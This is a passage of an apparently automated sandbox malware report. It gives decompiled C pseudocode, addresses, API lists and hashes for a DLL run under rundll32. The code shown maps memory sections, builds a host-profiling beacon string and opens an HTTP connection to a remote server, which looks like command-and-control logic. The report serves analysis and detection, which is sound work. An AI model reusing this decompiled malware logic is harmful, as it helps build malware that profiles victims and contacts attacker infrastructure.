				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E04DE3A9C(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                      0x04de25e0
                                      0x04de25e7
                                      0x04de25e8
                                      0x04de25e9
                                      0x04de25ea
                                      0x04de25eb
                                      0x04de25fc
                                      0x04de2600
                                      0x04de2614
                                      0x04de2617
                                      0x04de261a
                                      0x04de2621
                                      0x04de2624
                                      0x04de262b
                                      0x04de262e
                                      0x04de2631
                                      0x04de2634
                                      0x04de2639
                                      0x04de2674
                                      0x04de263b
                                      0x04de263e
                                      0x04de2644
                                      0x04de2649
                                      0x04de264d
                                      0x04de266b
                                      0x04de264f
                                      0x04de2656
                                      0x04de2664
                                      0x04de2664
                                      0x04de264d
                                      0x04de267c

                                      APIs
                                      • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,77004EE0,00000000,00000000,04DE759F), ref: 04DE2634
                                        • Part of subcall function 04DE3A9C: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,04DE2649,00000002,00000000,?,?,00000000,?,?,04DE2649,00000000), ref: 04DE3AC9
                                      • memset.NTDLL ref: 04DE2656
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Section$CreateViewmemset
                                      • String ID:
                                      • API String ID: 2533685722-0
                                      • Opcode ID: d9d64a364fb024a8bbd88631a5c423510446b5b41a7fba1de82a375655f3b97f
                                      • Instruction ID: f98a4d5acc0bc6031f20d73ebb8917c2d9d5d4f8ba95c5c151b00816d4fe4ddb
                                      • Opcode Fuzzy Hash: d9d64a364fb024a8bbd88631a5c423510446b5b41a7fba1de82a375655f3b97f
                                      • Instruction Fuzzy Hash: E3211DB5E0020DAFDB11DFA9C8849EEFBB9FF48354F108569E505F3210D731AA488BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE3A9C Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E04DE3A9C(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                      0x04de3aae
                                      0x04de3ab4
                                      0x04de3ac2
                                      0x04de3ac9
                                      0x04de3ace
                                      0x04de3ad4
                                      0x00000000
                                      0x04de3ad5
                                      0x00000000

                                      APIs
                                      • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,04DE2649,00000002,00000000,?,?,00000000,?,?,04DE2649,00000000), ref: 04DE3AC9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: SectionView
                                      • String ID:
                                      • API String ID: 1323581903-0
                                      • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                      • Instruction ID: 2445e725f387f3a919bb3b582041c1ed1af8682de248c9794e21325408760724
                                      • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                      • Instruction Fuzzy Hash: 0AF012B5A0420CBFDB119FA5CC85CAFBBBDEB44355B104939B552E2090D630EE489B60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE636D Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 214memorystringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      C-Code - Quality: 68%
                                      			E04DE636D(long __eax, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a20, intOrPtr _a24) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v52;
				void* __ecx;
				void* __edi;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t37;
				intOrPtr _t38;
				int _t41;
				void* _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t54;
				intOrPtr _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t66;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t82;
				int _t85;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				int _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				void* _t99;
				void* _t103;
				void* _t104;
				void* _t105;
				intOrPtr _t106;
				void* _t108;
				int _t109;
				void* _t110;
				void* _t111;
				void* _t113;
				void* _t114;
				void* _t116;

				_t103 = __edx;
				_t29 = __eax;
				_t113 = _a20;
				_v4 = 8;
				if(__eax == 0) {
					_t29 = GetTickCount();
				}
				_t30 =  *0x4dea018; // 0x258be91c
				asm("bswap eax");
				_t31 =  *0x4dea014; // 0x3a87c8cd
				asm("bswap eax");
				_t32 =  *0x4dea010; // 0xd8d2f808
				asm("bswap eax");
				_t33 =  *0x4dea00c; // 0x62819102
				asm("bswap eax");
				_t34 =  *0x4dea348; // 0x6bd5a8
				_t3 = _t34 + 0x4deb633; // 0x74666f73
				_t109 = wsprintfA(_t113, _t3, 2, 0x3d173, _t33, _t32, _t31, _t30,  *0x4dea02c,  *0x4dea004, _t29);
				_t37 = E04DE3F1E();
				_t38 =  *0x4dea348; // 0x6bd5a8
				_t4 = _t38 + 0x4deb673; // 0x74707526
				_t41 = wsprintfA(_t109 + _t113, _t4, _t37);
				_t116 = _t114 + 0x38;
				_t110 = _t109 + _t41;
				if(_a24 != 0) {
					_t92 =  *0x4dea348; // 0x6bd5a8
					_t8 = _t92 + 0x4deb67e; // 0x732526
					_t95 = wsprintfA(_t110 + _t113, _t8, _a24);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t95; // executed
				}
				_t42 = E04DE1567(_t99); // executed
				_t104 = _t42;
				if(_t104 != 0) {
					_t87 =  *0x4dea348; // 0x6bd5a8
					_t10 = _t87 + 0x4deb8d4; // 0x736e6426
					_t90 = wsprintfA(_t110 + _t113, _t10, _t104);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t90;
					HeapFree( *0x4dea2d8, 0, _t104);
				}
				_t105 = E04DE3268();
				if(_t105 != 0) {
					_t82 =  *0x4dea348; // 0x6bd5a8
					_t12 = _t82 + 0x4deb8dc; // 0x6f687726
					_t85 = wsprintfA(_t110 + _t113, _t12, _t105);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t85;
					HeapFree( *0x4dea2d8, 0, _t105);
				}
				_t106 =  *0x4dea3cc; // 0x54a95b0
				_a24 = E04DE5D1C(0x4dea00a, _t106 + 4);
				_t46 =  *0x4dea370; // 0x0
				if(_t46 != 0) {
					_t78 =  *0x4dea348; // 0x6bd5a8
					_t15 = _t78 + 0x4deb8b6; // 0x3d736f26
					_t81 = wsprintfA(_t110 + _t113, _t15, _t46);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t81;
				}
				_t47 =  *0x4dea36c; // 0x0
				if(_t47 != 0) {
					_t75 =  *0x4dea348; // 0x6bd5a8
					_t17 = _t75 + 0x4deb88d; // 0x3d706926
					wsprintfA(_t110 + _t113, _t17, _t47);
				}
				if(_a24 != 0) {
					_t108 = RtlAllocateHeap( *0x4dea2d8, 0, 0x800);
					if(_t108 != 0) {
						E04DE3950(GetTickCount());
						_t54 =  *0x4dea3cc; // 0x54a95b0
						__imp__(_t54 + 0x40);
						asm("lock xadd [eax], ecx");
						_t58 =  *0x4dea3cc; // 0x54a95b0
						__imp__(_t58 + 0x40);
						_t60 =  *0x4dea3cc; // 0x54a95b0
						_t61 = E04DE3739(1, _t103, _t113,  *_t60); // executed
						_t111 = _t61;
						asm("lock xadd [eax], ecx");
						if(_t111 != 0) {
							StrTrimA(_t111, 0x4de928c);
							_push(_t111);
							_t66 = E04DE3970();
							_a12 = _t66;
							if(_t66 != 0) {
								_t97 = __imp__;
								 *_t97(_t111, _v0);
								 *_t97(_t108, _v4);
								_t98 = __imp__;
								 *_t98(_t108, _v0);
								 *_t98(_t108, _t111);
								_t72 = E04DE5347(0xffffffffffffffff, _t108, _v24, _v20); // executed
								_v52 = _t72;
								if(_t72 != 0 && _t72 != 0x10d2) {
									E04DE3F62();
								}
								HeapFree( *0x4dea2d8, 0, _v16);
							}
							HeapFree( *0x4dea2d8, 0, _t111);
						}
						RtlFreeHeap( *0x4dea2d8, 0, _t108); // executed
					}
					HeapFree( *0x4dea2d8, 0, _a16);
				}
				RtlFreeHeap( *0x4dea2d8, 0, _t113); // executed
				return _a4;
			}




















































                                      0x04de636d
                                      0x04de636d
                                      0x04de6371
                                      0x04de6377
                                      0x04de6381
                                      0x04de6383
                                      0x04de6383
                                      0x04de6390
                                      0x04de639b
                                      0x04de639e
                                      0x04de63a9
                                      0x04de63ac
                                      0x04de63b1
                                      0x04de63b4
                                      0x04de63b9
                                      0x04de63bc
                                      0x04de63c8
                                      0x04de63d5
                                      0x04de63d7
                                      0x04de63dd
                                      0x04de63e2
                                      0x04de63ed
                                      0x04de63ef
                                      0x04de63f2
                                      0x04de63f9
                                      0x04de63fb
                                      0x04de6404
                                      0x04de640f
                                      0x04de6411
                                      0x04de6414
                                      0x04de6414
                                      0x04de6416
                                      0x04de641b
                                      0x04de641f
                                      0x04de6421
                                      0x04de6426
                                      0x04de6432
                                      0x04de6434
                                      0x04de6440
                                      0x04de6442
                                      0x04de6442
                                      0x04de644d
                                      0x04de6451
                                      0x04de6453
                                      0x04de6458
                                      0x04de6464
                                      0x04de6466
                                      0x04de6472
                                      0x04de6474
                                      0x04de6474
                                      0x04de647a
                                      0x04de648d
                                      0x04de6491
                                      0x04de6498
                                      0x04de649b
                                      0x04de64a0
                                      0x04de64ab
                                      0x04de64ad
                                      0x04de64b0
                                      0x04de64b0
                                      0x04de64b2
                                      0x04de64b9
                                      0x04de64bc
                                      0x04de64c1
                                      0x04de64cb
                                      0x04de64cd
                                      0x04de64d5
                                      0x04de64ee
                                      0x04de64f2
                                      0x04de64fe
                                      0x04de6503
                                      0x04de650c
                                      0x04de651d
                                      0x04de6521
                                      0x04de652a
                                      0x04de6530
                                      0x04de6538
                                      0x04de653d
                                      0x04de654a
                                      0x04de6550
                                      0x04de655c
                                      0x04de6562
                                      0x04de6563
                                      0x04de6568
                                      0x04de656e
                                      0x04de6574
                                      0x04de657b
                                      0x04de6582
                                      0x04de6588
                                      0x04de658f
                                      0x04de6593
                                      0x04de659e
                                      0x04de65a3
                                      0x04de65a9
                                      0x04de65b2
                                      0x04de65b2
                                      0x04de65c3
                                      0x04de65c3
                                      0x04de65d2
                                      0x04de65d2
                                      0x04de65e1
                                      0x04de65e1
                                      0x04de65f3
                                      0x04de65f3
                                      0x04de6602
                                      0x04de6612

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 04DE6383
                                      • wsprintfA.USER32 ref: 04DE63D0
                                      • wsprintfA.USER32 ref: 04DE63ED
                                      • wsprintfA.USER32 ref: 04DE640F
                                      • wsprintfA.USER32 ref: 04DE6432
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE6442
                                      • wsprintfA.USER32 ref: 04DE6464
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE6474
                                      • wsprintfA.USER32 ref: 04DE64AB
                                      • wsprintfA.USER32 ref: 04DE64CB
                                      • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04DE64E8
                                      • GetTickCount.KERNEL32 ref: 04DE64F8
                                      • RtlEnterCriticalSection.NTDLL(054A9570), ref: 04DE650C
                                      • RtlLeaveCriticalSection.NTDLL(054A9570), ref: 04DE652A
                                        • Part of subcall function 04DE3739: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,76D8C740,?,?,04DE653D,?,054A95B0), ref: 04DE3764
                                        • Part of subcall function 04DE3739: lstrlen.KERNEL32(?,?,?,04DE653D,?,054A95B0), ref: 04DE376C
                                        • Part of subcall function 04DE3739: strcpy.NTDLL ref: 04DE3783
                                        • Part of subcall function 04DE3739: lstrcat.KERNEL32(00000000,?), ref: 04DE378E
                                        • Part of subcall function 04DE3739: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04DE653D,?,054A95B0), ref: 04DE37AB
                                      • StrTrimA.SHLWAPI(00000000,04DE928C,?,054A95B0), ref: 04DE655C
                                        • Part of subcall function 04DE3970: lstrlen.KERNEL32(054A9B90,00000000,00000000,76D8C740,04DE6568,00000000), ref: 04DE3980
                                        • Part of subcall function 04DE3970: lstrlen.KERNEL32(?), ref: 04DE3988
                                        • Part of subcall function 04DE3970: lstrcpy.KERNEL32(00000000,054A9B90), ref: 04DE399C
                                        • Part of subcall function 04DE3970: lstrcat.KERNEL32(00000000,?), ref: 04DE39A7
                                      • lstrcpy.KERNEL32(00000000,?), ref: 04DE657B
                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 04DE6582
                                      • lstrcat.KERNEL32(00000000,?), ref: 04DE658F
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 04DE6593
                                        • Part of subcall function 04DE5347: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,770481D0), ref: 04DE53F9
                                      • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04DE65C3
                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04DE65D2
                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,054A95B0), ref: 04DE65E1
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE65F3
                                      • RtlFreeHeap.NTDLL(00000000,?), ref: 04DE6602
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                      • String ID: FNwPq
                                      • API String ID: 1892477351-3591455833
                                      • Opcode ID: 94b9871e1e1cf5680c7d48e0c21e87c30a184ca99d713f274cfda2a55084f62d
                                      • Instruction ID: 94d667ad0731f773695f6948cb931d65715600d9e3de746f8cea5daa4695e905
                                      • Opcode Fuzzy Hash: 94b9871e1e1cf5680c7d48e0c21e87c30a184ca99d713f274cfda2a55084f62d
                                      • Instruction Fuzzy Hash: A8717DB1201202AFD711BBA6EC68F6A3BE8FB48714F050515F904DB361DB39ED059B65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE7A71 Relevance: 19.6, APIs: 13, Instructions: 126networkstringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      C-Code - Quality: 92%
                                      			E04DE7A71(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				int _t53;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E04DE4DF6(__eax + __eax + 1);
				if(_t56 != 0) {
					_t53 = InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0); // executed
					if(_t53 == 0) {
						E04DE4C73(_t56);
					} else {
						E04DE4C73( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E04DE7A06) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E04DE3A6F( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x4dea348; // 0x6bd5a8
						_t15 = _t59 + 0x4deb743; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}















                                      0x04de7a71
                                      0x04de7a71
                                      0x04de7a7c
                                      0x04de7a83
                                      0x04de7a8b
                                      0x04de7a95
                                      0x04de7a9b
                                      0x04de7aa6
                                      0x04de7aae
                                      0x04de7abe
                                      0x04de7ab0
                                      0x04de7ab3
                                      0x04de7ab8
                                      0x04de7ab8
                                      0x04de7aae
                                      0x04de7ace
                                      0x04de7ad4
                                      0x04de7ad9
                                      0x04de7bc2
                                      0x00000000
                                      0x04de7af4
                                      0x04de7af7
                                      0x04de7b0a
                                      0x04de7b10
                                      0x04de7b15
                                      0x04de7b3d
                                      0x04de7b50
                                      0x04de7b5a
                                      0x04de7b5d
                                      0x04de7b63
                                      0x04de7b68
                                      0x00000000
                                      0x00000000
                                      0x04de7b6c
                                      0x04de7b78
                                      0x04de7b89
                                      0x04de7b8b
                                      0x04de7b9c
                                      0x04de7b9c
                                      0x04de7bac
                                      0x00000000
                                      0x04de7bbe
                                      0x00000000
                                      0x04de7bbe
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de7b15

                                      APIs
                                      • lstrlen.KERNEL32(?,00000008,77004D40), ref: 04DE7A83
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 04DE7AA6
                                      • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 04DE7ACE
                                      • InternetSetStatusCallback.WININET(00000000,04DE7A06), ref: 04DE7AE5
                                      • ResetEvent.KERNEL32(?), ref: 04DE7AF7
                                      • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 04DE7B0A
                                      • GetLastError.KERNEL32 ref: 04DE7B17
                                      • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 04DE7B5D
                                      • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 04DE7B7B
                                      • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 04DE7B9C
                                      • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 04DE7BA8
                                      • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 04DE7BB8
                                      • GetLastError.KERNEL32 ref: 04DE7BC2
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                      • String ID:
                                      • API String ID: 2290446683-0
                                      • Opcode ID: 1dda4a6faa7d32ff99377a36d3b458e21987ea9e55a0bfa8173663fafb7de7db
                                      • Instruction ID: 2f6bd947f6aabf7b088490d3ff8e5d7935e5d80c28361b124a8c41d9016a7bbc
                                      • Opcode Fuzzy Hash: 1dda4a6faa7d32ff99377a36d3b458e21987ea9e55a0bfa8173663fafb7de7db
                                      • Instruction Fuzzy Hash: 71419D71600605BBD731BFA6DC48EAB7BB9FB85700F108929F546D6290E735AA04DB20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE7EB5 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 96 4de7eb5-4de7f1a 97 4de7f1c-4de7f36 RaiseException 96->97 98 4de7f3b-4de7f65 96->98 99 4de80eb-4de80ef 97->99 100 4de7f6a-4de7f76 98->100 101 4de7f67 98->101 102 4de7f78-4de7f83 100->102 103 4de7f89-4de7f8b 100->103 101->100 102->103 111 4de80ce-4de80d5 102->111 104 4de8033-4de803d 103->104 105 4de7f91-4de7f98 103->105 107 4de803f-4de8047 104->107 108 4de8049-4de804b 104->108 109 4de7f9a-4de7fa6 105->109 110 4de7fa8-4de7fb5 LoadLibraryA 105->110 107->108 112 4de804d-4de8050 108->112 113 4de80c9-4de80cc 108->113 109->110 114 4de7ff8-4de8004 InterlockedExchange 109->114 110->114 115 4de7fb7-4de7fc7 GetLastError 110->115 119 4de80e9 111->119 120 4de80d7-4de80e4 111->120 122 4de807e-4de808c GetProcAddress 112->122 123 4de8052-4de8055 112->123 113->111 116 4de802c-4de802d FreeLibrary 114->116 117 4de8006-4de800a 114->117 124 4de7fc9-4de7fd5 115->124 125 4de7fd7-4de7ff3 RaiseException 115->125 116->104 117->104 127 4de800c-4de8018 LocalAlloc 117->127 119->99 120->119 122->113 126 4de808e-4de809e GetLastError 122->126 123->122 128 4de8057-4de8062 123->128 124->114 124->125 125->99 129 4de80aa-4de80ac 126->129 130 4de80a0-4de80a8 126->130 127->104 131 4de801a-4de802a 127->131 128->122 132 4de8064-4de806a 128->132 129->113 134 4de80ae-4de80c6 RaiseException 129->134 130->129 131->104 132->122 135 4de806c-4de806f 132->135 134->113 135->122 137 4de8071-4de807c 135->137 137->113 137->122
                                      C-Code - Quality: 51%
                                      			E04DE7EB5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4de0000;
				_t115 = _t139[3] + 0x4de0000;
				_t131 = _t139[4] + 0x4de0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4de0000;
				_v16 = _t139[5] + 0x4de0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4de0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x4dea1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x4dea1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x4dea1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x4dea1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x4dea1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x4dea1b8; // 0x0
										 *_t102 = _t125;
										 *0x4dea1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x4dea1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                                      0x04de7ec4
                                      0x04de7eda
                                      0x04de7ee0
                                      0x04de7ee2
                                      0x04de7ee7
                                      0x04de7eed
                                      0x04de7ef2
                                      0x04de7ef5
                                      0x04de7f03
                                      0x04de7f0a
                                      0x04de7f0d
                                      0x04de7f10
                                      0x04de7f11
                                      0x04de7f14
                                      0x04de7f17
                                      0x04de7f1a
                                      0x04de7f1f
                                      0x04de7f2e
                                      0x00000000
                                      0x04de7f34
                                      0x04de7f3e
                                      0x04de7f48
                                      0x04de7f4d
                                      0x04de7f4f
                                      0x04de7f59
                                      0x04de7f5c
                                      0x04de7f5f
                                      0x04de7f65
                                      0x04de7f67
                                      0x04de7f67
